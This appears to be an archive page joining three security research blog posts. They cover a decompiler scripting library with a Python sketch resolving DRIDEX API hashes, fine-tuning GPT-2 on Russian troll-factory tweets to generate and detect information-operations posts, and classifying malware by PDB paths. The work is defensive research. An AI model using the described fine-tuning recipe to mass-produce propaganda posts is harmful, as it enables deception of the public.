Figure 5: IDAPython script to automatically process and markup a DRIDEX sample

Running the above script results in output similar to what is shown in Figure 6, with comments labeling which functions are resolved.

Figure 6: The script in Figure 5 inserts comments into the decompiler output annotating decrypted strings
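The hashing scheme described for the DRIDEX sample can be reproduced outside of IDA to build a lookup table from hash to API name. This is a minimal sketch, assuming the hash is computed over the ASCII export name exactly as it appears in the export table; the sample may normalize case or include the DLL name, which would need to be confirmed against the binary. The export list is a short hypothetical stand-in for a real DLL's exports.

```python
import zlib

XOR_KEY = 0x65C54023  # XOR key given for this sample


def import_hash(name: str) -> int:
    """CRC32 of the export name, XORed with the key (assumed input form)."""
    return (zlib.crc32(name.encode("ascii")) ^ XOR_KEY) & 0xFFFFFFFF


def build_lookup(export_names) -> dict:
    """Map each pre-computable hash back to the export name it represents."""
    return {import_hash(name): name for name in export_names}


# Hypothetical export list; in practice this comes from parsing the DLL
exports = ["CreateFileW", "VirtualAlloc", "GetProcAddress"]
lookup = build_lookup(exports)

# A constant seen in the malware would be resolved like this
constant = import_hash("VirtualAlloc")
print(hex(constant), "->", lookup.get(constant))
```

With a table like this built from the exports of commonly abused DLLs, each hash constant passed to the resolver function can be replaced with a readable comment.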

You can find FIDL in the FireEye GitHub repository.

Conclusion

While the Hex-Rays decompiler is a powerful source of information during reverse engineering, writing generic scripts and plugins using the default API is difficult and requires handling numerous edge cases. This post introduced the FIDL library, a wrapper around the Hex-Rays API, which addresses this by reducing the number of low-level details an analyst needs to understand in order to create a script leveraging the decompiler, and should make the creation of these scripts much faster. In future blog posts we will publish more scripts and analysis utilizing this library.

Attention is All They Need: Combatting Social Media Information Operations With Neural Language Models

Threat Research

Sajidur Rahman

14 November 2019 at 17:00

Information operations have flourished on social media in part because they can be conducted cheaply, are relatively low risk, have immediate global reach, and can exploit the type of viral amplification incentivized by platforms. Using networks of coordinated accounts, social media-driven information operations disseminate and amplify content designed to promote specific political narratives, manipulate public opinion, foment discord, or achieve strategic ideological or geopolitical objectives. FireEye’s recent public reporting illustrates the continually evolving use of social media as a vehicle for this activity, highlighting information operations supporting Iranian political interests such as one that leveraged a network of inauthentic news sites and social media accounts and another that impersonated real individuals and leveraged legitimate news outlets.

Identifying sophisticated activity of this nature often requires the subject matter expertise of human analysts. After all, such content is purposefully and convincingly manufactured to imitate authentic online activity, making it difficult for casual observers to properly verify. The actors behind such operations are not transparent about their affiliations, often undertaking concerted efforts to mask their origins through elaborate false personas and the adoption of other operational security measures. With these operations being intentionally designed to deceive humans, can we turn towards automation to help us understand and detect this growing threat? Can we make it easier for analysts to discover and investigate this activity despite the heterogeneity, high traffic, and sheer scale of social media?

In this blog post, we will illustrate an example of how the FireEye Data Science (FDS) team works together with FireEye’s Information Operations Analysis team to better understand and detect social media information operations using neural language models.

Highlights

A new breed of deep neural networks uses an attention mechanism to home in on patterns within text, allowing us to better analyze the linguistic fingerprints and semantic stylings of information operations using modern Transformer models.
By fine-tuning an open source Transformer known as GPT-2, we can detect social media posts being leveraged in information operations despite their syntactic differences to the model’s original training data.
Transfer learning from pre-trained neural language models lowers the barrier to entry for generating high-quality synthetic text at scale, and this has implications for the future of both red and blue team operations as such models become increasingly commoditized.

Background: Using GPT-2 for Transfer Learning

OpenAI’s updated Generative Pre-trained Transformer (GPT-2) is an open source deep neural network that was trained in an unsupervised manner on the causal language modeling task. The objective of this language modeling task is to predict the next word in a sentence from previous context, meaning that a trained model ends up being capable of language generation. If the model can predict the next word accurately, it can be used in turn to predict the following word, and then so on and so forth until eventually, the model produces fully coherent sentences and paragraphs. Figure 1 depicts an example of language model (LM) predictions we generated using GPT-2. To generate text, single words are successively sampled from distributions of candidate words predicted by the model until it predicts an <|endoftext|> word, which signals the end of the generation.

Figure 1: An example GPT-2 generation prior to fine-tuning after priming the model with the phrase “It’s disgraceful that.”

The quality of this synthetically generated text along with GPT-2’s state of the art accuracy on a host of other natural language processing (NLP) benchmark tasks is due in large part to the model’s improvements over prior 1) neural network architectures and 2) approaches to representing text. GPT-2 uses an attention mechanism to selectively focus the model on relevant pieces of text sequences and identify relationships between positionally distant words. In terms of architectures, Transformers use attention to decrease the time required to train on enormous datasets; they also tend to model lengthy text and scale better than other competing feedforward and recurrent neural networks. In terms of representing text, word embeddings were a popular way to initialize just the first layer of neural networks, but such shallow representations required being trained from scratch for each new NLP task and in order to deal with new vocabulary. GPT-2 instead pre-trains all the model’s layers using hierarchical representations, which better capture language semantics and are readily transferable to other NLP tasks and new vocabulary.

This transfer learning method is advantageous because it allows us to avoid starting from scratch for each and every new NLP task. In transfer learning, we start from a large generic model that has been pre-trained for an initial task where copious data is available. We then leverage the model’s acquired knowledge to train it further on a different, smaller dataset so that it excels at a subsequent, related task. This process of training the model further is referred to as fine-tuning, which involves re-learning portions of the model by adjusting its underlying parameters. Fine-tuning not only requires less data compared to training from scratch, but typically also requires less compute time and resources.

In this blog post, we will show how to perform transfer learning from a pre-trained GPT-2 model in order to better understand and detect information operations on social media. Transformers have shown that Attention is All You Need, but here we will also show that Attention is All They Need: while transfer learning may allow us to more easily detect information operations activity, it likewise lowers the barrier to entry for actors seeking to engage in this activity at scale.

Understanding Information Operations Activity Using Fine-Tuned Neural Generations

In order to study the thematic and linguistic characteristics of a common type of social media-driven information operations activity, we first fine-tuned an LM that could perform text generation. Since the pre-trained GPT-2 model's dataset consisted of 40+ GB of Internet text data extracted from 8+ million reputable web pages, its generations display relatively formal grammar, punctuation, and structure that corresponds to the text present within that original dataset (e.g. Figure 1). To make the model's generations resemble social media posts, with their shorter length, informal grammar, erratic punctuation, and syntactic quirks including @mentions, #hashtags, emojis, acronyms, and abbreviations, we fine-tuned the pre-trained GPT-2 model on a new language modeling task using additional training data.

For the set of experiments presented in this blog post, this additional training data was obtained from the following open source datasets of identified accounts operated by Russia’s famed Internet Research Agency (IRA) “troll factory”:

NBCNews, over 200,000 tweets posted between 2014 and 2017 tied to IRA “malicious activity.”
FiveThirtyEight, over 1.8 million tweets associated with IRA activity between 2012 and 2018; we used accounts categorized as Left Troll, Right Troll, or Fearmonger.
Twitter Elections Integrity, almost 3 million tweets that were part of the influence effort by the IRA around the 2016 U.S. presidential election.
Reddit Suspicious Accounts, consisting of comments and submissions emanating from 944 accounts of suspected IRA origin.

After combining these four datasets, we sampled English-language social media posts from them to use as input for our fine-tuned LM. Fine-tuning experiments were carried out in PyTorch using the 355 million parameter pre-trained GPT-2 model from HuggingFace’s transformers library, and were distributed over up to 8 GPUs.

As opposed to other pre-trained LMs, GPT-2 conveniently requires minimal architectural changes and parameter updates in order to be fine-tuned on new downstream tasks. We simply processed social media posts from the above datasets through the pre-trained model, whose activations were then fed through adjustable weights into a linear output layer. The fine-tuning objective here was the same that GPT-2 was originally trained on (i.e. the language modeling task of predicting the next word, see Figure 1), except now its training dataset included text from social media posts. We also added the <|endoftext|> string as a suffix to each post to adapt the model to the shorter length of social media text, meaning posts were fed into the model according to:

“#Fukushima2015 Zaporozhia NPP can explode at any time
and that's awful! OMG! No way! #Nukraine<|endoftext|>”
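
As a minimal sketch of this preprocessing step, the helper below appends the end token to each post. The function name and the whitespace stripping are assumptions made for illustration; the post does not describe how the training examples were batched or tokenized.

```python
END_OF_TEXT = "<|endoftext|>"

def add_end_token(posts):
    """Return each non-empty post with the end-of-text token as a suffix.

    Stripping surrounding whitespace is an assumption, not a documented step.
    """
    return [post.strip() + END_OF_TEXT for post in posts if post.strip()]

examples = add_end_token(["OMG! No way! #Nukraine ", "", "second post"])
print(examples)
```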

Figure 2 depicts a few example generations made after fine-tuning GPT-2 on the IRA datasets. Observe how these text generations are formatted like something we might expect to encounter scrolling through social media – they are short yet biting, express certainty and outrage regarding political issues, and contain emphases like an exclamation point. They also contain idiosyncrasies like hashtags and emojis that positionally manifest at the end of the generated text, depicting a semantic style regularly exhibited by actual users.

Figure 2: Fine-tuning GPT-2 using the IRA datasets for the language modeling task. Example generations are primed with the same phrase from Figure 1, “It’s disgraceful that.” Hyphens are added for readability and not produced by the model.

How does the model produce such credible generations? Besides the weights that were adjusted during LM fine-tuning, some of the heavy lifting is also done by the underlying attention scores that were learned by GPT-2’s Transformer. Attention scores are computed between all words in a text sequence, and represent how important one word is when determining how important its nearby words will be in the next learning iteration. To compute attention scores, the Transformer performs a dot product between a Query vector q and a Key vector k:

q encodes the current hidden state, representing the word that searches for other words in the sequence to pay attention to that may help supply context for it.
k encodes the previous hidden states, representing the other words that receive attention from the query word and might contribute a better representation for it in its current context.

Figure 3 displays how this dot product is computed based on single neuron activations in q and k using an attention visualization tool called bertviz. Columns in Figure 3 trace the computation of attention scores from the highlighted word on the left, “America,” to the complete sequence of words on the right. For example, to decide to predict “#” following the word “America,” this part of the model focuses its attention on preceding words like “ban,” “Immigrants,” and “disgrace,” (note that the model has broken “Immigrants” into “Imm” and “igrants” because “Immigrants” is an uncommon word relative to its component word pieces within pre-trained GPT-2's original training dataset). The element-wise product shows how individual elements in q and k contribute to the dot product, which encodes the relationship between each word and every other context-providing word as the network learns from new text sequences. The dot product is finally normalized by a softmax function that outputs attention scores to be fed into the next layer of the neural network.
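
The computation traced in Figure 3 can be sketched in a few lines of plain Python. The vectors used here are made-up numbers, not activations from the fine-tuned model. The division by the square root of the vector length follows the scaled dot-product attention of the original Transformer paper and is not mentioned in the description above.

```python
import math

def softmax(xs):
    """Normalize raw scores into weights that sum to 1."""
    m = max(xs)  # subtract the max for numerical stability
    exps = [math.exp(x - m) for x in xs]
    total = sum(exps)
    return [e / total for e in exps]

def attention_scores(q, keys):
    """Attention of one query word over a list of key vectors."""
    d = len(q)
    raw = []
    for k in keys:
        # Element-wise product shows each neuron's contribution ...
        elementwise = [qi * ki for qi, ki in zip(q, k)]
        # ... and its sum is the dot product, scaled by sqrt(d).
        raw.append(sum(elementwise) / math.sqrt(d))
    return softmax(raw)

# Hypothetical 2-dimensional query and three keys.
scores = attention_scores([1.0, 0.0], [[1.0, 0.0], [0.0, 1.0], [-1.0, 0.0]])
print(scores)
```

The key that points in the same direction as the query receives the largest share of attention, and the key pointing the opposite way receives the smallest.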

Figure 3: The attention patterns for the query word highlighted in grey from one of the fine-tuned GPT-2 generations in Figure 2. Individual vertical bars represent neuron activations, horizontal bars represent vectors, and lines represent the strength of attention between words. Blue indicates positive values, red indicates negative values, and color intensity represents the magnitude of these values.

Syntactic relationships between words like “America,” “ban,” and “Immigrants” are valuable from an analysis point of view because they can help identify an information operation’s interrelated keywords and phrases. These indicators can be used to pivot between suspect social media accounts based on shared lexical patterns, help identify common narratives, and even to perform more proactive threat hunting. While the above example only scratches the surface of this complex, 355 million parameter model, qualitatively visualizing attention to understand the information learned by Transformers can help provide analysts insights into linguistic patterns being deployed as part of broader information operations activity.

Detecting Information Operations Activity by Fine-Tuning GPT-2 for Classification

In order to further support FireEye Threat Analysts’ work in discovering and triaging information operations activity on social media, we next fine-tuned a detection model to perform classification. Just like when we adapted GPT-2 for a new language modeling task in the previous section, we did not need to make any drastic architectural changes or parameter updates to fine-tune the model for the classification task. However, we did need to provide the model with a labeled dataset, so we grouped together social media posts based on whether they were leveraged in information operations (class label CLS = 1) or were benign (CLS = 0).

Benign, English-language posts were gathered from verified social media accounts, which generally corresponded to public figures and other prominent individuals or organizations whose posts contained diverse, innocuous content. For the purposes of this blog post, information operations-related posts were obtained from the previously mentioned open source IRA datasets. For the classification task, we separated the IRA datasets that were previously combined for LM fine-tuning, and selected posts from only one of them for the group associated with CLS = 1. To perform dataset selection quantitatively, we fine-tuned LMs on each IRA dataset to produce three different LMs while keeping 33% of the posts from each dataset held out as test data. Doing so allowed us to quantify the overlap between the individual IRA datasets based on how well one dataset’s LM was able to predict post content originating from the other datasets.

Figure 4: Confusion matrix representing perplexities of the LMs on their test datasets. The LM corresponding to the GPT-2 row was not fine-tuned; it corresponds to the pretrained GPT-2 model with reported perplexity of 18.3 on its own test set, which was unavailable for evaluation using the LMs. The Reddit dataset was excluded due to the low volume of samples.

In Figure 4, we show the result of computing perplexity scores for each of the three LMs and the original pre-trained GPT-2 model on held out test data from each dataset. Lower perplexity is better: it means the model assigned higher probability to the correct next word. The lowest scores fell along the main diagonal of the perplexity confusion matrix, meaning that the fine-tuned LMs were best at predicting the next word on test data originating from within their own datasets. The LM fine-tuned on Twitter’s Elections Integrity dataset displayed the lowest perplexity scores when averaged across all held out test datasets, so we selected posts sampled from this dataset to demonstrate classification fine-tuning.
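
For reference, perplexity is conventionally the exponential of the average negative log-probability that the model assigns to each correct next word. The sketch below uses that standard definition on made-up probabilities; it is not the evaluation code behind Figure 4.

```python
import math

def perplexity(token_probs):
    """exp of the mean negative log-probability of the correct next words."""
    nll = [-math.log(p) for p in token_probs]
    return math.exp(sum(nll) / len(nll))

# A model that always gives the right word probability 0.25 is as
# uncertain as a uniform choice among four words.
print(perplexity([0.25, 0.25, 0.25, 0.25]))
```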

Figure 5: (A) Training loss histories during GPT-2 fine-tuning for the classification (red) and LM (grey, inset) tasks. (B) ROC curve (red) evaluated on the held out fine-tuning test set, contrasted with random guess (grey dotted).

To fine-tune for the classification task, we once again processed the selected dataset’s posts through the pre-trained GPT-2 model. This time, activations were fed through adjustable weights into two linear output layers instead of just the single one used for the language modeling task in the previous section. Here, fine-tuning was formulated as a multi-task objective with classification loss together with an auxiliary LM loss, which helped accelerate convergence during training and improved the generalization of the model. We also prepended posts with a new [BOS] (i.e. Beginning Of Sentence) string and suffixed posts with the previously mentioned [CLS] class label string, so that each post was fed into the model according to:

“[BOS]Kevin Mandia was on @CNBC’s @MadMoneyOnCNBC with @jimcramer discussing targeted disinformation heading into the… https://t.co/l2xKQJsuwk[CLS]”

The [BOS] string played a similar delimiting role to the <|endoftext|> string used previously in LM fine-tuning, and the [CLS] string encoded the hidden state ∈ {0, 1} that was the label fed to the model’s classification layer. The example social media post above came from the benign dataset, so this sample’s label was set to CLS = 0 during fine-tuning. Figure 5A shows the evolution of classification and auxiliary LM losses during fine-tuning, and Figure 5B displays the ROC curve for the fine-tuned classifier on its test set consisting of around 66,000 social media posts. The convergence of the losses to low values, together with a high Area Under the ROC Curve (i.e. AUC), illustrates that transfer learning allowed this model to accurately detect social media posts associated with IRA information operations activity versus benign ones. Taken together, these metrics indicate that the fine-tuned classifier should generalize well to newly ingested social media posts, providing analysts a capability they can use to separate signal from noise.
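
A rough sketch of the input formatting and the multi-task objective follows. The lm_weight parameter and both function names are hypothetical: the post states only that an auxiliary LM loss was combined with the classification loss, not how the two were weighted.

```python
import math

def format_post(text):
    """Wrap a post in the delimiter strings described above."""
    return "[BOS]" + text + "[CLS]"

def multitask_loss(cls_probs, label, lm_step_probs, lm_weight=0.5):
    """Classification cross-entropy plus a weighted auxiliary LM loss.

    cls_probs: predicted probabilities for classes 0 and 1.
    label: the true class (0 benign, 1 information operations).
    lm_step_probs: probability given to each correct next word in the post.
    lm_weight: assumed mixing coefficient, not taken from the post.
    """
    cls_loss = -math.log(cls_probs[label])
    lm_loss = sum(-math.log(p) for p in lm_step_probs) / len(lm_step_probs)
    return cls_loss + lm_weight * lm_loss

print(format_post("example post"))
print(multitask_loss([0.9, 0.1], 0, [0.5, 0.25]))
```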

Conclusion

In this blog post, we demonstrated how to fine-tune a neural LM on open source datasets containing social media posts previously leveraged in information operations. Transfer learning allowed us to classify these posts with a high AUC score, and FireEye’s Threat Analysts can utilize this detection capability in order to discover and triage similar emergent operations. Additionally, we showed how Transformer models assign scores to different pieces of text via an attention mechanism. This visualization can be used by analysts to tease apart adversary tradecraft based on posts’ linguistic fingerprints and semantic stylings.

Transfer learning also allowed us to generate credible synthetic text with low perplexity scores. One of the barriers actors face when devising effective information operations is adequately capturing the nuances and context of the cultural climate in which their targets are situated. Our exercise here suggests this costly step could be bypassed using pre-trained LMs, whose generations can be fine-tuned to embody the zeitgeist of social media. GPT-2’s authors and subsequent researchers have warned about potential malicious use cases enabled by this powerful natural language generation technology, and while it was conducted here for a defensive application in a controlled offline setting using readily available open source data, our research reinforces this concern. As trends towards more powerful and readily available language generation models continue, it is important to redouble efforts towards detection as demonstrated by Figure 5 and other promising approaches such as Grover.

This research was conducted during a three-month FireEye IGNITE University Program summer internship, and represents a collaboration between the FDS and FireEye Threat Intelligence’s Information Operations Analysis teams. If you are interested in working on multidisciplinary projects at the intersection of cyber security and machine learning, please consider applying to one of our 2020 summer internships.

Definitive Dossier of Devilish Debug Details – Part Deux: A Didactic Deep Dive into Data Driven Deductions

Threat Research

Matt Berninger

17 October 2019 at 15:30

In Part One of this blog series, Steve Miller outlined what PDB paths are, how they appear in malware, how we use them to detect malicious files, and how we sometimes use them to make associations about groups and actors.

As Steve continued his research into PDB paths, we became interested in applying more general statistical analysis. The PDB path as an artifact poses an intriguing use case for a couple of reasons.

First, the PDB artifact is not directly tied to the functionality of the binary. As a byproduct of the compilation process, it contains information about the development environment, and by proxy, the malware author themselves. Rarely do we encounter static malware features with such an interesting tie to the human behind the keyboard, rather than the functionality of the file.

Second, file paths are an incredibly complex artifact with many different possible encodings. We had personally been dying to find an excuse to spend more time figuring out how to parse and encode paths in a more useful way. This presented an opportunity to dive into this space and test different approaches to representing file paths in various models.

The objectives of our project were:

Build a large data set of PDB paths and apply some statistical methods to find potentially new signature terms and logic.
Investigate whether applying machine learning classification approaches to this problem could improve our detection above writing hand-crafted signatures.
Build a PDB classifier as a weak signal for binary analysis.

To start, we began gathering data. Our dataset, pulled from internal and external sources, started with over 200,000 samples. Once we deduplicated by PDB path, we had around 50,000 samples. Next, we needed to consistently label these samples, so we considered various labeling schemes.

Labeling Binaries With PDB Paths

For many of the binaries we had internal FireEye labels, and for others we looked up hashes on VirusTotal (VT) to have a look at their detection rates. This covered the majority of our samples. For a relatively small subset we had disagreements between our internal engine and VT results, which merited a slightly more nuanced policy. The disagreement was most often that our internal assessment determined a file to be benign, but the VT results showed a nonzero percentage of vendors detecting the file as malicious. In these cases we plotted the “VT ratio”: that is, the percentage of vendors labeling the files as malicious (Figure 1).

Figure 1: Ratio of vendors calling file bad/total number of vendors

The vast majority of these samples had VT detection ratios below 0.3, and in those cases we labeled the binaries as benign. For the remainder of samples we tried two strategies – marking them all as malicious, or removing them from the training set entirely. Our classification performance did not change much between these two policies, so in the end we scrapped the remainder of the samples to reduce label noise.
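
The final policy for these disagreement cases can be written as a small function. This is a sketch of the rule as described, with a hypothetical function name; a return value of None means the sample is dropped from the training set.

```python
def resolve_disagreement(vt_malicious, vt_total, threshold=0.3):
    """Label a sample our engine called benign but some VT vendors flagged.

    Returns "benign" when the VT ratio is below the threshold, otherwise
    None to indicate the sample should be left out of training.
    """
    if vt_total == 0:
        return None  # no vendor verdicts to compute a ratio from
    ratio = vt_malicious / vt_total
    return "benign" if ratio < threshold else None

print(resolve_disagreement(3, 60))   # ratio 0.05
print(resolve_disagreement(30, 60))  # ratio 0.5
```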

Building Features

Next, we had to start building features. This is where the fun began. Looking at dozens and dozens of PDB paths, we simply started recording various things that ‘pop out’ to an analyst. As noted earlier, a file path contains tons of implicit information, beyond simply being a string-based artifact. One analogy we have found useful is that a file path is akin to a geographical location, in that it represents a location on the file system. Another is that it is like a sentence, in that it reflects a series of dependent items.

To further illustrate this point, consider a simple file path such as:

C:\Users\World\Desktop\duck\Zbw138ht2aeja2.pdb (source file)

This path tells us several things:

This software was compiled on the system drive of the computer
In a user profile, under user ‘World’
The project is managed on the Desktop, in a folder called ‘duck’
The filename has a high degree of entropy and is not very easy to remember

In contrast, consider something such as:

D:\VSCORE5\BUILD\VSCore\release\EntVUtil.pdb (source file)

This indicates:

Compilation on an external or secondary drive
Within a non-user directory
Contains development terms such as ‘BUILD’ and ‘release’
With a sensible, semi-memorable file name

These differences seem relatively straightforward and make intuitive sense as to why one might be representative of malware development whereas the other represents a more “legitimate-looking” development environment.

Feature Representations

How do we represent these differences to a model? The easiest and most obvious option is to calculate some statistics on each path. Features such as folder depth, path length, entropy, and counting things such as numbers, letters, and special characters in the PDB filename are easy to compute.
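
A minimal sketch of such per-path statistics is shown below. The exact feature definitions (for example, computing entropy over the filename without its extension) are assumptions chosen for illustration rather than the definitions used in our experiments.

```python
import math
from collections import Counter

def shannon_entropy(s):
    """Character-level Shannon entropy in bits."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())

def path_stats(path):
    """Simple statistical features for a Windows-style PDB path."""
    parts = path.split("\\")
    stem = parts[-1].rsplit(".", 1)[0]  # filename without extension
    return {
        "depth": len(parts) - 2,  # folders between drive and filename
        "path_length": len(path),
        "filename_entropy": shannon_entropy(stem),
        "filename_digits": sum(c.isdigit() for c in stem),
        "filename_letters": sum(c.isalpha() for c in stem),
        "filename_special": sum(not c.isalnum() for c in stem),
    }

print(path_stats(r"C:\Users\World\Desktop\duck\Zbw138ht2aeja2.pdb"))
```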

However, upon evaluation against our dataset, these features did not help to separate the classes very well. The following are some graphics detailing the distributions of these features between our classes of malicious and benign samples:

While there is potentially some separation between benign and malicious distributions, these features alone would likely not lead to an effective classifier (we tried). Additionally, we couldn’t easily translate these differences into explicit detection rules. There was more information in the paths that we needed to extract, so we began to look at how to encode the directory names themselves.

Normalization

As with any dataset, we had to undertake some steps to normalize the paths. For example, the occurrence of individual usernames, while perhaps interesting from an intelligence perspective, would be represented as distinct entities when in fact they have the same semantic meaning. Thus, we had to detect and replace usernames with <username> to normalize this representation. Other folder idiosyncrasies such as version numbers or randomly generated directories could similarly be normalized into <version> or <random>.

A typical normalized path might therefore go from this:

C:\Users\jsmith\Documents\Visual Studio 2013\Projects\mkzyu91952\mkzyu91952\obj\x86\Debug\mkzyu91952.pdb

To this:

c:\users\<username>\documents\visual studio 2013\projects\<random>\<random>\obj\x86\debug\mkzyu91952.pdb

You may notice that the PDB filename itself was not normalized. In this case we wanted to derive features from the filename itself, so we left it. Other approaches could be to normalize it, or even to make note that the same filename string ‘mkzyu91952’ appears earlier in the path. There are endless possible features when dealing with file paths.
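
One way to sketch this normalization is with a few simple heuristics. The rules below (the folder after "users" is a username, dotted digits are a version, long names mixing letters and digits are random) are assumptions made for illustration and are much cruder than what a production pipeline would need.

```python
import re

VERSION_RE = re.compile(r"^v?\d+(\.\d+)+$")  # e.g. 1.2.3 or v10.0

def looks_random(name):
    """Heuristic: long, no spaces, and mixes letters with digits."""
    return (
        len(name) >= 8
        and " " not in name
        and any(c.isdigit() for c in name)
        and any(c.isalpha() for c in name)
    )

def normalize_pdb_path(path):
    """Lowercase the path and replace idiosyncratic folders with tokens."""
    parts = path.lower().split("\\")
    drive, dirs, filename = parts[0], parts[1:-1], parts[-1]
    out = []
    for i, name in enumerate(dirs):
        if i > 0 and dirs[i - 1] == "users":
            out.append("<username>")
        elif VERSION_RE.match(name):
            out.append("<version>")
        elif looks_random(name):
            out.append("<random>")
        else:
            out.append(name)
    # The filename is deliberately left untouched, as discussed above.
    return "\\".join([drive] + out + [filename])

print(normalize_pdb_path(
    r"C:\Users\jsmith\Documents\Visual Studio 2013\Projects"
    r"\mkzyu91952\mkzyu91952\obj\x86\Debug\mkzyu91952.pdb"
))
```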

Directory Analysis

Once we had normalized directories, we could start to “tokenize” each directory term, to start performing some statistical analysis. Our main goal of this analysis was to see if there were any directory terms that highly corresponded to maliciousness, or see if there were any simple combinations, such as pairs or triplets, that exhibited similar behavior.

We did not find any single directory name that easily separated the classes. That would be too easy. However, we did find some general correlations with directories such as “Desktop” being somewhat more likely to be malicious, and use of shared drives such as Z: to be more indicative of a benign file. This makes intuitive sense given the more collaborative environment a “legitimate” software development process might require. There are, of course, many exceptions and this is what makes the problem tricky.

Another strong signal we found, at least in our dataset, is that when the word “Desktop” was in a non-English language and particularly in a different alphabet, the likelihood of that PDB path being tied to a malicious file was very high (Figure 2). While potentially useful, this can be indicative of geographical bias in our dataset, and further research would need to be done to see if this type of signature would generalize.

Figure 2: Unicode desktop folders from malicious samples

Various Tokenizing Schemes

In recording the directories of a file path, there are several ways you can represent the path. Let’s use this path to illustrate these different approaches:

c:\Leave\smell\Long\ruleThis.pdb (file)

Bag of Words

One very simple way is the “bag-of-words” approach, which simply treats the path as the distinct set of directory names it contains. Therefore, the aforementioned path would be represented as:

['c:', 'leave', 'smell', 'long', 'rulethis']

Positional Analysis

Another approach we considered was recording the position of each directory name, as a distance from the drive. This retained more information about depth, such that a ‘build’ directory on the desktop would be treated differently than a ‘build’ directory nine directories further down. For this purpose, we excluded the drives since they would always have the same depth.

['leave_1', 'smell_2', 'long_3', 'rulethis_4']

N-Gram Analysis

Finally, we explored breaking paths into n-grams; that is, into distinct sets of n adjacent directories. For example, a 2-gram representation of this path might look like:

['c:\leave', 'leave\smell', 'smell\long', 'long\rulethis']

We tested each of these approaches and while positional analysis and n-grams contained more information, in the end, bag-of-words seemed to generalize best. Additionally, using the bag-of-words approach made it easier to extract simple signature logic from the resultant models, as will be shown in a later section.
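
The three tokenizing schemes can be sketched as follows. The function names are hypothetical, and dropping the .pdb extension from the last term is inferred from the example outputs above.

```python
def split_path(path):
    """Lowercase a Windows-style path and split it into terms."""
    parts = path.lower().split("\\")
    parts[-1] = parts[-1].rsplit(".", 1)[0]  # drop the .pdb extension
    return parts

def bag_of_words(path):
    """Distinct terms in the path, in first-seen order."""
    return list(dict.fromkeys(split_path(path)))

def positional(path):
    """Each term tagged with its distance from the drive (drive excluded)."""
    return [f"{name}_{i}" for i, name in enumerate(split_path(path)[1:], start=1)]

def ngrams(path, n=2):
    """Runs of n adjacent terms joined by a backslash."""
    parts = split_path(path)
    return ["\\".join(parts[i:i + n]) for i in range(len(parts) - n + 1)]

example = r"c:\Leave\smell\Long\ruleThis.pdb"
print(bag_of_words(example))
print(positional(example))
print(ngrams(example))
```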

Term Co-Occurrence

Since we had the bag-of-words vectors created for each path, we were also able to evaluate term co-occurrence across benign and malicious files. When we evaluated the co-occurrence of pairs of terms, we found some other interesting pairings that indeed paint two very different pictures of development environments (Figure 3).

Correlated with Malicious Files	Correlated with Benign Files
users, desktop	src, retail
documents, visual studio 2012	obj, x64
local, temporary projects	src, x86
users, projects	src, win32
users, documents	retail, dynamic
appdata, temporary projects	src, amd64
users, x86	src, x64

Figure 3: Correlated pairs with malicious and benign files
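
A simple way to tabulate pairs like these is to count how often each pair of terms appears together in malicious versus benign paths. The sketch below uses the malicious share of each pair as a stand-in for "correlation"; the statistic actually used is not specified here, and the sample data is invented for illustration.

```python
from collections import Counter
from itertools import combinations

def pair_counts(samples):
    """Count co-occurring term pairs per class.

    samples: iterable of (terms, is_malicious) tuples.
    """
    malicious, benign = Counter(), Counter()
    for terms, is_malicious in samples:
        pairs = combinations(sorted(set(terms)), 2)
        (malicious if is_malicious else benign).update(pairs)
    return malicious, benign

def malicious_share(pair, malicious, benign):
    """Fraction of a pair's occurrences that were in malicious paths."""
    total = malicious[pair] + benign[pair]
    return malicious[pair] / total if total else None

# Hypothetical bag-of-words samples.
samples = [
    (["users", "desktop", "duck"], True),
    (["users", "desktop"], True),
    (["src", "retail"], False),
    (["users", "desktop", "src"], False),
]
mal, ben = pair_counts(samples)
print(malicious_share(("desktop", "users"), mal, ben))
```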

Keyword Lists

Our bag-of-words representation of the PDB paths then gave us a set of nearly 70,000 distinct terms. The vast majority of these terms occurred once or twice in the entire dataset, resulting in what is known as a ‘long-tailed’ distribution. Figure 4 is a graph of only the top 100 most common terms in descending order.

Figure 4: Long tailed distribution of term occurrence

As you can see, the counts drop off quickly, and you are left dealing with an enormous number of terms that may only appear a handful of times. One very simple way to solve this problem, without losing a ton of information, is to simply cut off a keyword list after a certain number of entries. For example, take the top 50 occurring folder names (across both good and bad files), and save them as a keyword list. Then match this list against every path in the dataset. To create features, one-hot encode each match.

Rather than arbitrarily setting a cutoff, we wanted to know a bit more about the distribution and understand where might be a good place to set a limit – such that we would cover enough of the samples without drastically increasing the number of features for our model. We therefore calculated the cumulative number of samples covered by each term, as we iterated down the list from most common to least common. Figure 5 is a graph showing the result.

Figure 5: Cumulative share of samples covered by distinct terms

As you can see, with only a small fraction of the terms, we can arrive at a significant percentage of the cumulative total PDB paths. Setting a simple cutoff at about 70% of the dataset resulted in roughly 230 terms for our total vocabulary. This gave us enough information about the dataset without blowing up our model with too many features (and therefore, dimensions). One-hot encoding the presence of these terms was then the final step in featurizing the directory names present in the paths.
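
The cutoff and encoding steps might be sketched as below. Here "coverage" is interpreted as the share of paths containing at least one vocabulary term, which is one plausible reading of Figure 5 and an assumption on our part; the sample data is invented.

```python
from collections import Counter

def build_vocabulary(paths_terms, target_coverage=0.7):
    """Add terms from most to least common until enough paths are covered."""
    doc_freq = Counter(t for terms in paths_terms for t in set(terms))
    vocab, covered = [], set()
    for term, _ in doc_freq.most_common():
        vocab.append(term)
        covered.update(i for i, terms in enumerate(paths_terms) if term in terms)
        if len(covered) / len(paths_terms) >= target_coverage:
            break
    return vocab

def one_hot(terms, vocab):
    """1 where a vocabulary term is present in the path, else 0."""
    present = set(terms)
    return [1 if t in present else 0 for t in vocab]

# Hypothetical bag-of-words representations of five paths.
paths_terms = [
    ["users", "desktop"],
    ["users", "projects"],
    ["src", "retail"],
    ["src", "x64"],
    ["z:", "build"],
]
vocab = build_vocabulary(paths_terms)
print(vocab, one_hot(["src", "x64"], vocab))
```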

YARA Signatures Do Grow on Trees

Armed with some statistical features, as well as one-hot encoded keyword matches, we began to train some models on our now-featurized dataset. In doing so, we hoped to use the model training and evaluation process to give us insights into how to build better signatures. If we developed an effective classification model, that would be an added benefit.

We felt that tree-based models made sense for this use case for two reasons. First, tree-based models have worked well in the past in domains requiring a certain amount of interpretability and using a blend of quantitative and categorical features. Second, the features we used are largely things we could represent in a YARA signature. Therefore, if our models built boolean logic branches that separated large numbers of PDB files, we could potentially translate these into signatures. This is not to say that other model families could not be used to build strong classifiers. Many other options ranging from Logistic Regression to Deep Learning could be considered.

